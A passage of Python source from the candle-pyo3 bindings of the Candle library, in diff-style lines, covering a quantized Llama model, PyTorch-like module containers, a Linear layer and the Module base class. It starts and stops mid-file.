+ def forward(self, input_ids: Tensor, token_type_ids: Tensor, attention_mask=None) -> Tuple[Tensor, Optional[Tensor]]:
351
+ if attention_mask is not None:
352
+ attention_mask = masked_fill(float('-inf'), attention_mask, 1.0)
353
+ embeddings = self.embeddings.forward(input_ids, token_type_ids)
354
+ encoder_out = self.encoder.forward(embeddings, attention_mask=attention_mask)
355
+ pooled_output = self.pooler(encoder_out) if self.pooler is not None else None
356
+ return (encoder_out, pooled_output)
357
+
358
+ # File: candle-main/candle-pyo3/py_src/candle/models/llama.py
359
+ import candle
360
+ from typing import Dict, Tuple, Any
361
+ from candle import Tensor, QTensor, utils, nn
362
+ from candle.nn import Module, ModuleList
363
+
364
+ def masked_fill(on_false: Tensor, mask: Tensor, on_true: Tensor):
365
+ shape = mask.shape
366
+ on_true = candle.tensor(on_true).broadcast_as(shape)
367
+ return mask.where_cond(on_true, on_false)
368
+
369
+ def precompute_freqs_cis(hparams: Dict[str, Any], freq_base: float, max_seq_len: int):
370
+ head_dim = hparams['n_embd'] // hparams['n_head']
371
+ theta = [1.0 / freq_base ** (i / head_dim) for i in range(0, head_dim, 2)]
372
+ theta = candle.tensor(theta)
373
+ idx_theta = [float(i) for i in range(max_seq_len)]
374
+ idx_theta = candle.tensor(idx_theta).reshape((max_seq_len, 1))
375
+ m = idx_theta.matmul(theta.unsqueeze(0))
376
+ return (m.cos(), m.sin())
377
+
378
+ class RmsNorm(Module):
379
+
380
+ def __init__(self, qtensor: QTensor):
381
+ super().__init__()
382
+ self.weight = qtensor.dequantize()
383
+
384
+ def forward(self, x: Tensor) -> Tensor:
385
+ (b_size, seq_len, hidden_size) = x.shape
386
+ norm_x = x.sqr().sum_keepdim(2) / hidden_size
387
+ x_normed = x.broadcast_div((norm_x + 1e-05).sqrt())
388
+ return x_normed.broadcast_mul(self.weight)
389
+
390
+ class QuantizedLayer(Module):
391
+
392
+ def __init__(self, layer_idx: int, hparams: Dict[str, Any], all_tensors: Dict[str, QTensor], cos_sin: Tuple[Tensor, Tensor]):
393
+ super().__init__()
394
+ p = f'layers.{layer_idx}'
395
+ self.attention_wq = all_tensors[f'{p}.attention.wq.weight']
396
+ self.attention_wk = all_tensors[f'{p}.attention.wk.weight']
397
+ self.attention_wv = all_tensors[f'{p}.attention.wv.weight']
398
+ self.attention_wo = all_tensors[f'{p}.attention.wo.weight']
399
+ self.ffw1 = all_tensors[f'{p}.feed_forward.w1.weight']
400
+ self.ffw2 = all_tensors[f'{p}.feed_forward.w2.weight']
401
+ self.ffw3 = all_tensors[f'{p}.feed_forward.w3.weight']
402
+ self.attn_norm = RmsNorm(all_tensors[f'{p}.attention_norm.weight'])
403
+ self.ffn_norm = RmsNorm(all_tensors[f'{p}.ffn_norm.weight'])
404
+ self.n_head = hparams['n_head']
405
+ self.n_kv_head = self.n_head
406
+ self.head_dim = hparams['n_embd'] // self.n_head
407
+ self.kv_cache = None
408
+ self.cos = cos_sin[0]
409
+ self.sin = cos_sin[1]
410
+ self._non_persistent_buffers_set.add('cos')
411
+ self._non_persistent_buffers_set.add('sin')
412
+
413
+ def forward(self, x: Tensor, mask: Tensor, index_pos: int) -> Tensor:
414
+ residual = x
415
+ x = self.attn_norm(x)
416
+ attn = self.forward_attn(x, mask, index_pos)
417
+ x = attn + residual
418
+ residual = x
419
+ x = self.ffn_norm(x)
420
+ w1 = self.ffw1.matmul_t(x)
421
+ w3 = self.ffw3.matmul_t(x)
422
+ mlp = self.ffw2.matmul_t(nn.silu(w1) * w3)
423
+ return mlp + residual
424
+
425
+ def forward_attn(self, x: Tensor, mask: Tensor, index_pos: int):
426
+ (b_size, seq_len, n_embd) = x.shape
427
+ q = self.attention_wq.matmul_t(x)
428
+ k = self.attention_wk.matmul_t(x)
429
+ v = self.attention_wv.matmul_t(x)
430
+ q = q.reshape((b_size, seq_len, self.n_head, self.head_dim)).transpose(1, 2)
431
+ k = k.reshape((b_size, seq_len, self.n_kv_head, self.head_dim)).transpose(1, 2)
432
+ v = v.reshape((b_size, seq_len, self.n_kv_head, self.head_dim)).transpose(1, 2)
433
+ q = self.apply_rotary_emb(q, index_pos)
434
+ k = self.apply_rotary_emb(k, index_pos)
435
+ if self.kv_cache is not None and index_pos > 0:
436
+ (prev_k, prev_v) = self.kv_cache
437
+ k = candle.cat([prev_k, k], 2).contiguous()
438
+ v = candle.cat([prev_v, v], 2).contiguous()
439
+ self.kv_cache = (k, v)
440
+ att = q.matmul(k.t()) / self.head_dim ** 0.5
441
+ mask = mask.broadcast_as(att.shape)
442
+ att = masked_fill(att, mask, float('-inf'))
443
+ att = nn.softmax(att, -1)
444
+ y = att.matmul(v.contiguous())
445
+ y = y.transpose(1, 2).reshape((b_size, seq_len, n_embd))
446
+ return self.attention_wo.matmul_t(y)
447
+
448
+ def apply_rotary_emb(self, x: Tensor, index_pos: int):
449
+ (b_size, n_head, seq_len, n_embd) = x.shape
450
+ cos = self.cos.narrow(0, index_pos, seq_len).reshape((seq_len, n_embd // 2, 1))
451
+ sin = self.sin.narrow(0, index_pos, seq_len).reshape((seq_len, n_embd // 2, 1))
452
+ x = x.reshape((b_size, n_head, seq_len, n_embd // 2, 2))
453
+ x0 = x.narrow(-1, 0, 1)
454
+ x1 = x.narrow(-1, 1, 1)
455
+ y0 = x0.broadcast_mul(cos) - x1.broadcast_mul(sin)
456
+ y1 = x0.broadcast_mul(sin) + x1.broadcast_mul(cos)
457
+ rope = candle.cat([y0, y1], -1)
458
+ return rope.flatten_from(-2)
459
+
460
+ class QuantizedLlama(Module):
461
+
462
+ def __init__(self, hparams: Dict[str, Any], all_tensors: Dict[str, QTensor]):
463
+ super().__init__()
464
+ self.tok_embeddings = all_tensors['tok_embeddings.weight'].dequantize()
465
+ self.norm = RmsNorm(all_tensors['norm.weight'])
466
+ self.output = all_tensors['output.weight']
467
+ self.layers = ModuleList()
468
+ rope_freq = hparams.get('rope_freq', 10000.0)
469
+ cos_sin = precompute_freqs_cis(hparams, rope_freq, hparams['context_length'])
470
+ for layer_idx in range(hparams['n_layer']):
471
+ layer = QuantizedLayer(layer_idx, hparams, all_tensors, cos_sin)
472
+ self.layers.append(layer)
473
+
474
+ def forward(self, token: Tensor, index_pos: int) -> Tensor:
475
+ (b_size, seq_len) = token.shape
476
+ (vocab_size, hidden_size) = self.tok_embeddings.shape
477
+ token = token.reshape((b_size * seq_len,))
478
+ x = self.tok_embeddings.index_select(token, 0)
479
+ x = x.reshape((b_size, seq_len, hidden_size))
480
+ mask = [int(j > i) for j in range(seq_len) for i in range(seq_len)]
481
+ mask = candle.tensor(mask).reshape((seq_len, seq_len))
482
+ for layer in self.layers:
483
+ x = layer(x, mask, index_pos)
484
+ x = self.norm(x)
485
+ x = x.narrow(1, -1, 1).squeeze(1)
486
+ x = self.output.matmul_t(x)
487
+ return x
488
+
489
+ # File: candle-main/candle-pyo3/py_src/candle/nn/container.py
490
+ from .module import Module
491
+ from typing import Any, Dict, Iterable, Iterator, Mapping, Optional, overload, Tuple, TypeVar, Union
492
+ from collections import OrderedDict, abc as container_abcs
493
+ import operator
494
+ from itertools import chain, islice
495
+ __all__ = ['Sequential', 'ModuleList', 'ModuleDict']
496
+ T = TypeVar('T', bound=Module)
497
+
498
+ def _addindent(s_: str, numSpaces: int):
499
+ s = s_.split('\n')
500
+ if len(s) == 1:
501
+ return s_
502
+ first = s.pop(0)
503
+ s = [numSpaces * ' ' + line for line in s]
504
+ s = '\n'.join(s)
505
+ s = first + '\n' + s
506
+ return s
507
+
508
+ class Sequential(Module):
509
+ _modules: Dict[str, Module]
510
+
511
+ @overload
512
+ def __init__(self, *args: Module) -> None:
513
+ ...
514
+
515
+ @overload
516
+ def __init__(self, arg: 'OrderedDict[str, Module]') -> None:
517
+ ...
518
+
519
+ def __init__(self, *args):
520
+ super().__init__()
521
+ if len(args) == 1 and isinstance(args[0], OrderedDict):
522
+ for (key, module) in args[0].items():
523
+ self.add_module(key, module)
524
+ else:
525
+ for (idx, module) in enumerate(args):
526
+ self.add_module(str(idx), module)
527
+
528
+ def _get_item_by_idx(self, iterator, idx) -> T:
529
+ size = len(self)
530
+ idx = operator.index(idx)
531
+ if not -size <= idx < size:
532
+ raise IndexError('index {} is out of range'.format(idx))
533
+ idx %= size
534
+ return next(islice(iterator, idx, None))
535
+
536
+ def __getitem__(self, idx: Union[slice, int]) -> Union['Sequential', T]:
537
+ if isinstance(idx, slice):
538
+ return self.__class__(OrderedDict(list(self._modules.items())[idx]))
539
+ else:
540
+ return self._get_item_by_idx(self._modules.values(), idx)
541
+
542
+ def __setitem__(self, idx: int, module: Module) -> None:
543
+ key: str = self._get_item_by_idx(self._modules.keys(), idx)
544
+ return setattr(self, key, module)
545
+
546
+ def __delitem__(self, idx: Union[slice, int]) -> None:
547
+ if isinstance(idx, slice):
548
+ for key in list(self._modules.keys())[idx]:
549
+ delattr(self, key)
550
+ else:
551
+ key = self._get_item_by_idx(self._modules.keys(), idx)
552
+ delattr(self, key)
553
+ str_indices = [str(i) for i in range(len(self._modules))]
554
+ self._modules = OrderedDict(list(zip(str_indices, self._modules.values())))
555
+
556
+ def __len__(self) -> int:
557
+ return len(self._modules)
558
+
559
+ def __add__(self, other) -> 'Sequential':
560
+ if isinstance(other, Sequential):
561
+ ret = Sequential()
562
+ for layer in self:
563
+ ret.append(layer)
564
+ for layer in other:
565
+ ret.append(layer)
566
+ return ret
567
+ else:
568
+ raise ValueError('add operator supports only objects of Sequential class, but {} is given.'.format(str(type(other))))
569
+
570
+ def pop(self, key: Union[int, slice]) -> Module:
571
+ v = self[key]
572
+ del self[key]
573
+ return v
574
+
575
+ def __iadd__(self, other) -> 'Sequential':
576
+ if isinstance(other, Sequential):
577
+ offset = len(self)
578
+ for (i, module) in enumerate(other):
579
+ self.add_module(str(i + offset), module)
580
+ return self
581
+ else:
582
+ raise ValueError('add operator supports only objects of Sequential class, but {} is given.'.format(str(type(other))))
583
+
584
+ def __mul__(self, other: int) -> 'Sequential':
585
+ if not isinstance(other, int):
586
+ raise TypeError(f'unsupported operand type(s) for *: {type(self)} and {type(other)}')
587
+ elif other <= 0:
588
+ raise ValueError(f'Non-positive multiplication factor {other} for {type(self)}')
589
+ else:
590
+ combined = Sequential()
591
+ offset = 0
592
+ for _ in range(other):
593
+ for module in self:
594
+ combined.add_module(str(offset), module)
595
+ offset += 1
596
+ return combined
597
+
598
+ def __rmul__(self, other: int) -> 'Sequential':
599
+ return self.__mul__(other)
600
+
601
+ def __imul__(self, other: int) -> 'Sequential':
602
+ if not isinstance(other, int):
603
+ raise TypeError(f'unsupported operand type(s) for *: {type(self)} and {type(other)}')
604
+ elif other <= 0:
605
+ raise ValueError(f'Non-positive multiplication factor {other} for {type(self)}')
606
+ else:
607
+ len_original = len(self)
608
+ offset = len(self)
609
+ for _ in range(other - 1):
610
+ for i in range(len_original):
611
+ self.add_module(str(i + offset), self._modules[str(i)])
612
+ offset += len_original
613
+ return self
614
+
615
+ def __dir__(self):
616
+ keys = super().__dir__()
617
+ keys = [key for key in keys if not key.isdigit()]
618
+ return keys
619
+
620
+ def __iter__(self) -> Iterator[Module]:
621
+ return iter(self._modules.values())
622
+
623
+ def forward(self, input):
624
+ for module in self:
625
+ input = module(input)
626
+ return input
627
+
628
+ def append(self, module: Module) -> 'Sequential':
629
+ self.add_module(str(len(self)), module)
630
+ return self
631
+
632
+ def insert(self, index: int, module: Module) -> 'Sequential':
633
+ if not isinstance(module, Module):
634
+ raise AssertionError('module should be of type: {}'.format(Module))
635
+ n = len(self._modules)
636
+ if not -n <= index <= n:
637
+ raise IndexError('Index out of range: {}'.format(index))
638
+ if index < 0:
639
+ index += n
640
+ for i in range(n, index, -1):
641
+ self._modules[str(i)] = self._modules[str(i - 1)]
642
+ self._modules[str(index)] = module
643
+ return self
644
+
645
+ def extend(self, sequential) -> 'Sequential':
646
+ for layer in sequential:
647
+ self.append(layer)
648
+ return self
649
+
650
+ class ModuleList(Module):
651
+ _modules: Dict[str, Module]
652
+
653
+ def __init__(self, modules: Optional[Iterable[Module]]=None) -> None:
654
+ super().__init__()
655
+ if modules is not None:
656
+ self += modules
657
+
658
+ def _get_abs_string_index(self, idx):
659
+ idx = operator.index(idx)
660
+ if not -len(self) <= idx < len(self):
661
+ raise IndexError('index {} is out of range'.format(idx))
662
+ if idx < 0:
663
+ idx += len(self)
664
+ return str(idx)
665
+
666
+ def __getitem__(self, idx: Union[int, slice]) -> Union[Module, 'ModuleList']:
667
+ if isinstance(idx, slice):
668
+ return self.__class__(list(self._modules.values())[idx])
669
+ else:
670
+ return self._modules[self._get_abs_string_index(idx)]
671
+
672
+ def __setitem__(self, idx: int, module: Module) -> None:
673
+ idx = self._get_abs_string_index(idx)
674
+ return setattr(self, str(idx), module)
675
+
676
+ def __delitem__(self, idx: Union[int, slice]) -> None:
677
+ if isinstance(idx, slice):
678
+ for k in range(len(self._modules))[idx]:
679
+ delattr(self, str(k))
680
+ else:
681
+ delattr(self, self._get_abs_string_index(idx))
682
+ str_indices = [str(i) for i in range(len(self._modules))]
683
+ self._modules = OrderedDict(list(zip(str_indices, self._modules.values())))
684
+
685
+ def __len__(self) -> int:
686
+ return len(self._modules)
687
+
688
+ def __iter__(self) -> Iterator[Module]:
689
+ return iter(self._modules.values())
690
+
691
+ def __iadd__(self, modules: Iterable[Module]) -> 'ModuleList':
692
+ return self.extend(modules)
693
+
694
+ def __add__(self, other: Iterable[Module]) -> 'ModuleList':
695
+ combined = ModuleList()
696
+ for (i, module) in enumerate(chain(self, other)):
697
+ combined.add_module(str(i), module)
698
+ return combined
699
+
700
+ def __repr__(self):
701
+ list_of_reprs = [repr(item) for item in self]
702
+ if len(list_of_reprs) == 0:
703
+ return self._get_name() + '()'
704
+ start_end_indices = [[0, 0]]
705
+ repeated_blocks = [list_of_reprs[0]]
706
+ for (i, r) in enumerate(list_of_reprs[1:], 1):
707
+ if r == repeated_blocks[-1]:
708
+ start_end_indices[-1][1] += 1
709
+ continue
710
+ start_end_indices.append([i, i])
711
+ repeated_blocks.append(r)
712
+ lines = []
713
+ main_str = self._get_name() + '('
714
+ for ((start_id, end_id), b) in zip(start_end_indices, repeated_blocks):
715
+ local_repr = f'({start_id}): {b}'
716
+ if start_id != end_id:
717
+ n = end_id - start_id + 1
718
+ local_repr = f'({start_id}-{end_id}): {n} x {b}'
719
+ local_repr = _addindent(local_repr, 2)
720
+ lines.append(local_repr)
721
+ main_str += '\n ' + '\n '.join(lines) + '\n'
722
+ main_str += ')'
723
+ return main_str
724
+
725
+ def __dir__(self):
726
+ keys = super().__dir__()
727
+ keys = [key for key in keys if not key.isdigit()]
728
+ return keys
729
+
730
+ def insert(self, index: int, module: Module) -> None:
731
+ for i in range(len(self._modules), index, -1):
732
+ self._modules[str(i)] = self._modules[str(i - 1)]
733
+ self._modules[str(index)] = module
734
+
735
+ def append(self, module: Module) -> 'ModuleList':
736
+ self.add_module(str(len(self)), module)
737
+ return self
738
+
739
+ def pop(self, key: Union[int, slice]) -> Module:
740
+ v = self[key]
741
+ del self[key]
742
+ return v
743
+
744
+ def extend(self, modules: Iterable[Module]) -> 'ModuleList':
745
+ if not isinstance(modules, container_abcs.Iterable):
746
+ raise TypeError('ModuleList.extend should be called with an iterable, but got ' + type(modules).__name__)
747
+ offset = len(self)
748
+ for (i, module) in enumerate(modules):
749
+ self.add_module(str(offset + i), module)
750
+ return self
751
+
752
+ class ModuleDict(Module):
753
+ _modules: Dict[str, Module]
754
+
755
+ def __init__(self, modules: Optional[Mapping[str, Module]]=None) -> None:
756
+ super().__init__()
757
+ if modules is not None:
758
+ self.update(modules)
759
+
760
+ def __getitem__(self, key: str) -> Module:
761
+ return self._modules[key]
762
+
763
+ def __setitem__(self, key: str, module: Module) -> None:
764
+ self.add_module(key, module)
765
+
766
+ def __delitem__(self, key: str) -> None:
767
+ del self._modules[key]
768
+
769
+ def __len__(self) -> int:
770
+ return len(self._modules)
771
+
772
+ def __iter__(self) -> Iterator[str]:
773
+ return iter(self._modules)
774
+
775
+ def __contains__(self, key: str) -> bool:
776
+ return key in self._modules
777
+
778
+ def clear(self) -> None:
779
+ self._modules.clear()
780
+
781
+ def pop(self, key: str) -> Module:
782
+ v = self[key]
783
+ del self[key]
784
+ return v
785
+
786
+ def keys(self) -> Iterable[str]:
787
+ return self._modules.keys()
788
+
789
+ def items(self) -> Iterable[Tuple[str, Module]]:
790
+ return self._modules.items()
791
+
792
+ def values(self) -> Iterable[Module]:
793
+ return self._modules.values()
794
+
795
+ def update(self, modules: Mapping[str, Module]) -> None:
796
+ if not isinstance(modules, container_abcs.Iterable):
797
+ raise TypeError('ModuleDict.update should be called with an iterable of key/value pairs, but got ' + type(modules).__name__)
798
+ if isinstance(modules, (OrderedDict, ModuleDict, container_abcs.Mapping)):
799
+ for (key, module) in modules.items():
800
+ self[key] = module
801
+ else:
802
+ for (j, m) in enumerate(modules):
803
+ if not isinstance(m, container_abcs.Iterable):
804
+ raise TypeError('ModuleDict update sequence element #' + str(j) + ' should be Iterable; is' + type(m).__name__)
805
+ if not len(m) == 2:
806
+ raise ValueError('ModuleDict update sequence element #' + str(j) + ' has length ' + str(len(m)) + '; 2 is required')
807
+ self[m[0]] = m[1]
808
+
809
+ # File: candle-main/candle-pyo3/py_src/candle/nn/linear.py
810
+ import math
811
+ from typing import Any
812
+ import candle
813
+ from candle import Tensor
814
+ from .module import Module
815
+
816
+ class Identity(Module):
817
+
818
+ def __init__(self, *args: Any, **kwargs: Any) -> None:
819
+ super().__init__()
820
+
821
+ def forward(self, input: Tensor) -> Tensor:
822
+ return input
823
+
824
+ class Linear(Module):
825
+ __constants__ = ['in_features', 'out_features']
826
+ in_features: int
827
+ out_features: int
828
+ weight: Tensor
829
+
830
+ def __init__(self, in_features: int, out_features: int, bias: bool=True, device=None, dtype=None) -> None:
831
+ factory_kwargs = {'device': device, 'dtype': dtype}
832
+ super().__init__()
833
+ self._quantizable_buffers.add('weight')
834
+ self.in_features = in_features
835
+ self.out_features = out_features
836
+ self.weight = candle.ones((out_features, in_features), **factory_kwargs)
837
+ if bias:
838
+ self.bias = candle.zeros((out_features,), **factory_kwargs)
839
+ else:
840
+ self.bias = None
841
+
842
+ def forward(self, x: Tensor) -> Tensor:
843
+ dims = x.shape
844
+ last_dim = dims[-1]
845
+ if isinstance(self.weight, candle.QTensor):
846
+ if len(dims) < 3:
847
+ matmul_result = self.weight.matmul_t(x).broadcast_add(self.bias)
848
+ elif len(dims) == 3:
849
+ (b, n, m) = dims
850
+ output_shape = (b, n, self.out_features)
851
+ re = x.reshape((b * n, m))
852
+ matmul_result = self.weight.matmul_t(re).reshape(output_shape)
853
+ else:
854
+ raise NotImplementedError("'QTensor.matmul_t' is not implemented for more than 3 dimensions")
855
+ if self.bias:
856
+ return matmul_result.broadcast_add(self.bias)
857
+ else:
858
+ if self.weight.shape[-1] == last_dim and len(dims) < 3:
859
+ w = self.weight.t()
860
+ else:
861
+ batch_size = dims[0]
862
+ w = self.weight.broadcast_left((batch_size,)).t()
863
+ x = x.matmul(w)
864
+ if self.bias is not None:
865
+ x = x.broadcast_add(self.bias)
866
+ return x
867
+
868
+ def extra_repr(self) -> str:
869
+ return f'in_features={self.in_features}, out_features={self.out_features}, bias={self.bias is not None}'
870
+
871
+ # File: candle-main/candle-pyo3/py_src/candle/nn/module.py
872
+ from candle import Tensor, QTensor, DType
873
+ from typing import Dict, Tuple, Any, Optional, Union, Iterator, Set, overload, Mapping, TypeVar, List
874
+ from collections import OrderedDict, namedtuple
875
+ TensorLike = Union[Tensor, QTensor]
876
+ T = TypeVar('T', bound='Module')
877
+
878
+ class _IncompatibleKeys(namedtuple('IncompatibleKeys', ['missing_keys', 'unexpected_keys'])):
879
+
880
+ def __repr__(self):
881
+ if not self.missing_keys and (not self.unexpected_keys):
882
+ return '<All keys matched successfully>'
883
+ return super().__repr__()
884
+ __str__ = __repr__
885
+
886
+ class Module:
887
+ _modules: Dict[str, Optional['Module']]
888
+ _buffers: Dict[str, Optional[TensorLike]]
889
+ _non_persistent_buffers_set: Set[str]
890
+ _quantizable_buffers: Set[str]
891
+ _version: int = 1
892
+
893
+ def __init__(self, *args, **kwargs) -> None:
894
+ super().__setattr__('_modules', OrderedDict())
895
+ super().__setattr__('_buffers', OrderedDict())
896
+ super().__setattr__('_non_persistent_buffers_set', set())
897
+ super().__setattr__('_quantizable_buffers', set())
898
+
899
+ def __call__(self, *input):
900
+ return self.forward(*input)
901
+
902
+ def forward(self, *input):
903
+ pass
904
+
905
+ def children(self) -> Iterator['Module']:
906
+ for (name, module) in self.named_children():
907
+ yield module
908
+
909
+ def named_children(self) -> Iterator[Tuple[str, 'Module']]:
910
+ memo = set()
911
+ for (name, module) in self._modules.items():
912
+ if module is not None and module not in memo:
913
+ memo.add(module)
914
+ yield (name, module)
915
+
916
+ def add_module(self, name: str, module: Optional['Module']) -> None:
917
+ if not isinstance(module, Module) and module is not None:
918
+ raise TypeError(f'{str(module)} is not a Module subclass')
919
+ elif not isinstance(name, str):
920
+ raise TypeError(f'module name should be a string. Got {name}')
921
+ elif hasattr(self, name) and name not in self._modules:
922
+ raise KeyError(f"attribute '{name}' already exists")
923
+ elif '.' in name:
924
+ raise KeyError(f"""module name can't contain ".", got: {name}""")
925
+ elif name == '':
926
+ raise KeyError('module name can\'t be empty string ""')
927
+ self._modules[name] = module
928
+
929
+ def register_module(self, name: str, module: Optional['Module']) -> None:
930
+ self.add_module(name, module)
931
+
932
+ def modules(self) -> Iterator['Module']:
933
+ for (_, module) in self.named_modules():
934
+ yield module
935
+
936
+ def named_modules(self, memo: Optional[Set['Module']]=None, prefix: str='', remove_duplicate: bool=True):
937
+ if memo is None:
938
+ memo = set()
939
+ if self not in memo:
940
+ if remove_duplicate:
941
+ memo.add(self)
942
+ yield (prefix, self)
943
+ for (name, module) in self._modules.items():
944
+ if module is None:
945
+ continue
946
+ submodule_prefix = prefix + ('.' if prefix else '') + name
947
+ for m in module.named_modules(memo, submodule_prefix, remove_duplicate):
948
+ yield m
949
+
950
+ def buffers(self, recurse: bool=True) -> Iterator[TensorLike]:
951
+ for (name, buf) in self.named_buffers(recurse=recurse):
952
+ yield buf
953
+
954
+ def named_buffers(self, prefix: str='', recurse: bool=True, remove_duplicate: bool=True) -> Iterator[Tuple[str, TensorLike]]:
955
+ gen = self._named_members(lambda module: module._buffers.items(), prefix=prefix, recurse=recurse, remove_duplicate=remove_duplicate)
956
+ yield from gen
957
+ T_destination = TypeVar('T_destination', bound=Dict[str, Any])
958
+
959
+ @overload
960
+ def state_dict(self, *, destination: T_destination, prefix: str=..., keep_vars: bool=...) -> T_destination:
961
+ ...
962
+
963
+ @overload
964
+ def state_dict(self, *, prefix: str=..., keep_vars: bool=...) -> Dict[str, Any]:
965
+ ...
966
+
967
+ def state_dict(self, *args, destination=None, prefix='', keep_vars=False):
968
+ if len(args) > 0:
969
+ if destination is None:
970
+ destination = args[0]
971
+ if len(args) > 1 and prefix == '':
972
+ prefix = args[1]
973
+ if len(args) > 2 and keep_vars is False:
974
+ keep_vars = args[2]
975
+ if destination is None:
976
+ destination = OrderedDict()
977
+ destination._metadata = OrderedDict()
978
+ local_metadata = dict(version=self._version)
979
+ if hasattr(destination, '_metadata'):
980
+ destination._metadata[prefix[:-1]] = local_metadata
981
+ self._save_to_state_dict(destination, prefix, keep_vars)
982
+ for (name, module) in self._modules.items():
983
+ if module is not None:
984
+ module.state_dict(destination=destination, prefix=prefix + name + '.', keep_vars=keep_vars)
985
+ return destination
986
+
987
+ def _save_to_state_dict(self, destination, prefix, keep_vars):
988
+ for (name, buf) in self._buffers.items():
989
+ if buf is not None and name not in self._non_persistent_buffers_set:
990
+ if isinstance(buf, Tensor):
991
+ destination[prefix + name] = buf if keep_vars else buf.detach()
992
+ else:
993
+ destination[prefix + name] = buf
994
+
995
+ def load_state_dict(self, state_dict: Mapping[str, Any], strict: bool=True, assign: bool=False):
996
+ if not isinstance(state_dict, Mapping):
997
+ raise TypeError(f'Expected state_dict to be dict-like, got {type(state_dict)}.')
998
+ missing_keys: List[str] = []
999
+ unexpected_keys: List[str] = []
1000
+ error_msgs: List[str] = []
1001
+ metadata = getattr(state_dict, '_metadata', None)
1002
+ state_dict = OrderedDict(state_dict)
1003
+ if metadata is not None:
1004
+ state_dict._metadata = metadata
1005
+
1006
+ def load(module, local_state_dict, prefix=''):
1007
+ local_metadata = {} if metadata is None else metadata.get(prefix[:-1], {})
1008
+ if assign:
1009
+ local_metadata['assign_to_params_buffers'] = assign
1010
+ module._load_from_state_dict(local_state_dict, prefix, local_metadata, True, missing_keys, unexpected_keys, error_msgs)
1011
+ for (name, child) in module._modules.items():
1012
+ if child is not None:
1013
+ child_prefix = prefix + name + '.'
1014
+ child_state_dict = {k: v for (k, v) in local_state_dict.items() if k.startswith(child_prefix)}
1015
+ load(child, child_state_dict, child_prefix)
1016
+ load(self, state_dict)
1017
+ del load
1018
+ if strict:
1019
+ if len(unexpected_keys) > 0:
1020
+ error_msgs.insert(0, 'Unexpected key(s) in state_dict: {}. '.format(', '.join((f'"{k}"' for k in unexpected_keys))))
1021
+ if len(missing_keys) > 0:
1022
+ error_msgs.insert(0, 'Missing key(s) in state_dict: {}. '.format(', '.join((f'"{k}"' for k in missing_keys))))
1023
+ if len(error_msgs) > 0:
1024
+ raise RuntimeError('Error(s) in loading state_dict for {}:\n\t{}'.format(self.__class__.__name__, '\n\t'.join(error_msgs)))
1025
+ return _IncompatibleKeys(missing_keys, unexpected_keys)
1026
+
1027
+ def _load_from_state_dict(self, state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs):
1028
+ persistent_buffers = {k: v for (k, v) in self._buffers.items() if k not in self._non_persistent_buffers_set}
1029
+ local_name_params = persistent_buffers.items()
1030
+ local_state = {k: v for (k, v) in local_name_params if v is not None}
1031
+ for (name, param) in local_state.items():
1032
+ key = prefix + name
1033
+ if key in state_dict:
1034
+ input_param = state_dict[key]
1035
+ if not isinstance(input_param, (Tensor, QTensor)):
1036
+ error_msgs.append(f'While copying the parameter named "{key}", expected Tensor-like object from checkpoint but received {type(input_param)}')
1037
+ continue
1038
+ if input_param.shape != param.shape:
1039
+ error_msgs.append('size mismatch for {}: copying a param with shape {} from checkpoint, the shape in current model is {}.'.format(key, input_param.shape, param.shape))
1040
+ continue
1041
+ try:
1042
+ setattr(self, name, input_param)
1043
+ except Exception as ex:
1044
+ error_msgs.append(f'While copying the parameter named "{key}", whose dimensions in the model are {param.shape} and whose dimensions in the checkpoint are {input_param.shape}, an exception occurred : {ex.args}.')
1045
+ elif strict:
1046
+ missing_keys.append(key)
1047
+ if strict:
1048
+ for key in state_dict.keys():
1049
+ if key.startswith(prefix):
1050
+ input_name = key[len(prefix):]
1051
+ input_name = input_name.split('.', 1)[0]
1052
+ if input_name not in self._modules and input_name not in local_state:
1053
+ unexpected_keys.append(key)
1054
+
1055
+ def _named_members(self, get_members_fn, prefix='', recurse=True, remove_duplicate: bool=True):
1056
+ memo = set()
1057
+ modules = self.named_modules(prefix=prefix, remove_duplicate=remove_duplicate) if recurse else [(prefix, self)]
1058
+ for (module_prefix, module) in modules:
1059
+ members = get_members_fn(module)
1060
+ for (k, v) in members:
1061
+ if v is None or v in memo:
1062
+ continue
1063
+ if remove_duplicate:
1064
+ memo.add(v)
1065
+ name = module_prefix + ('.' if module_prefix else '') + k
1066
+ yield (name, v)
1067
+
1068
+ def _get_name(self):
1069
+ return self.__class__.__name__
1070
+
1071
+ def _apply(self, fn):
1072
+ for module in self.children():
1073
+ module._apply(fn)
1074
+ for (key, buf) in self._buffers.items():
1075
+ if buf is not None:
1076
+ self._buffers[key] = fn(buf)
1077
+ return self
1078
+
1079
+ def __move_tensor_to_device(self, tensor: TensorLike, device: str):
1080
+ if isinstance(tensor, Tensor):
1081
+ return tensor.to_device(device)
1082
+ else:
1083
+ raise NotImplementedError('Cannot offload QTensor to cuda, yet!')
1084
+
1085
+ def device(self) -> str:
1086
+ tensor = next(self.buffers())
1087
+ if isinstance(tensor, Tensor):
1088
+ return tensor.device
1089
+ else:
1090
+ return 'cpu'
1091
+
1092
+ def cuda(self: T) -> T:
1093
+
1094
+ def to_cuda(t: TensorLike):
1095
+ return self.__move_tensor_to_device(t, 'cuda')
1096
+ return self._apply(to_cuda)
1097
+
1098
+ def cpu(self: T) -> T:
1099
+
1100
+ def to_cpu(t: TensorLike):
1101
+ return self.__move_tensor_to_device(t, 'cpu')
1102
+ return self._apply(to_cpu)
1103
+
1104
+ def __cast_tensor(self, tensor: TensorLike, dtype: Union[DType, str]):
1105
+ if isinstance(tensor, Tensor):
1106
+ return tensor.to_dtype(dtype)
1107
+ else:
1108
+ raise TypeError('candle.Module.to only accepts Tensor dtypes, but got desired dtype={}'.format(dtype))
1109
+
1110
+ def type(self: T, dst_type: Union[DType, str]) -> T:
1111
+
1112
+ def cast(t: TensorLike):
1113
+ return self.__cast_tensor(t, dst_type)
1114
+ return self._apply(cast)
1115
+
1116
+ @overload
1117
+ def to(self: T, device: str=..., dtype: Optional[Union[DType, str]]=...) -> T:
1118
+ ...
1119
+
1120
+ @overload
1121
+ def to(self: T, dtype: Union[DType, str]) -> T:
1122
+ ...
1123
+
1124
+ def to(self, *args, **kwargs):
1125
+ device = None
1126
+ dtype = None
1127
+ if args:
1128
+ for arg in args:
1129
+ if isinstance(arg, str):
1130
+ lower_arg = str(arg).lower()
1131
+ if lower_arg.startswith('cuda') or lower_arg == 'cpu':
1132
+ device = lower_arg
1133
+ else:
1134
+ dtype = arg
1135
+ elif isinstance(arg, DType):
1136
+ dtype = str(arg)
1137
+ else:
1138
